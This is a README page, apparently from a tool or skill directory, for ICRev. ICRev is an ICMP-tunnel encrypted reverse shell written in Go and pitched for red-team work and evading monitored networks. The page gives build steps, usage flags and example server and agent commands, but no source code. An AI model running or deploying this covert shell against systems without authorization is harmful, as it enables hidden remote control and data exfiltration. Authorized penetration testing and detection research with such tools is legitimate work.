ICRev
Establishes an encrypted reverse shell between a server and client over an ICMP-based covert tunnel
Install / Use
/learn @DarkBitx/ICRevREADME
ICRev v1.0
ICRev is a lightweight ICMP tunneling tool developed in Go, providing an encrypted reverse shell channel over ICMP packets. Designed for red team engagements and penetration testing scenarios where conventional network channels may be monitored or restricted, ICRev operates as a fully self-contained application without external dependencies, leveraging only Go's standard library.
<img width="1920" height="1080" alt="alt" src="https://github.com/user-attachments/assets/1452db94-bd21-4a70-b06b-b2dc3961a9f0" />Key Features
- ICMP Client/Server Reverse Shell Mode: Enables secure, bidirectional communication via ICMP for command execution and data exfiltration.
- AES-Encrypted Payloads: Supports configurable secret keys or auto-generated keys for robust encryption.
- HMAC-Authenticate Payloads: Payloads are authenticated with HMAC (SHA-256) to ensure integrity and origin, preventing tampering and spoofing.
- Minimal Dependencies: No external libraries required, ensuring portability and ease of deployment.
Quick Start: Build and Installation
These instructions assume Go 1.20+ is installed with GOPATH and GOROOT properly configured.
git clone https://github.com/DarkBitx/ICRev.git
cd ICRev
go mod tidy
go build -trimpath -ldflags="-s -w"
Verification:
icrev --help
Usage
Usage: ICRev [options]
ICRev is a stealthy ICMP tunneling tool for secure reverse shell operations.
Required Options:
-i, --interface string Interface IP to listen on (e.g., 0.0.0.0)
-t, --target string Target address to establish tunnel (e.g., 192.168.1.100)
Optional Options:
-p, --secret string Secret key for authentication (default: auto-generated)
-s, --server Enable server mode (default: agent mode)
-v, --verbose Enable verbose output
Example:
icrev -i 0.0.0.0 -t 192.168.1.100 -s -v
System Requirements & Configuration
Root privileges are required for creating and handling raw ICMP sockets.
Before running ICRev in server mode, it’s recommended to disable system ICMP echo responses to prevent conflicts with the tool’s packet handling:
sudo sysctl -w net.ipv4.icmp_echo_ignore_all=1
Examples
Start the Server (listen for incoming agent packets):
./icrev -i 0.0.0.0 -t 192.168.1.100 -s
Run the Agent (connect to the server):
./icrev -t 192.168.1.100 -i 0.0.0.0
Use a Static Secret Key:
./icrev --interface 0.0.0.0 --target 192.168.1.100 --server --secret "YourSuperSecretKey"
Contact
Author: DarkBit "Lucyber" | Email: darkbitx01@protonmail.com | Telegram: https://t.me/DarkBitx
Related Skills
node-connect
338.7kDiagnose OpenClaw node connection and pairing failures for Android, iOS, and macOS companion apps
frontend-design
83.6kCreate distinctive, production-grade frontend interfaces with high design quality. Use this skill when the user asks to build web components, pages, or applications. Generates creative, polished code that avoids generic AI aesthetics.
openai-whisper-api
338.7kTranscribe audio via OpenAI Audio Transcriptions API (Whisper).
commit-push-pr
83.6kCommit, push, and open a PR
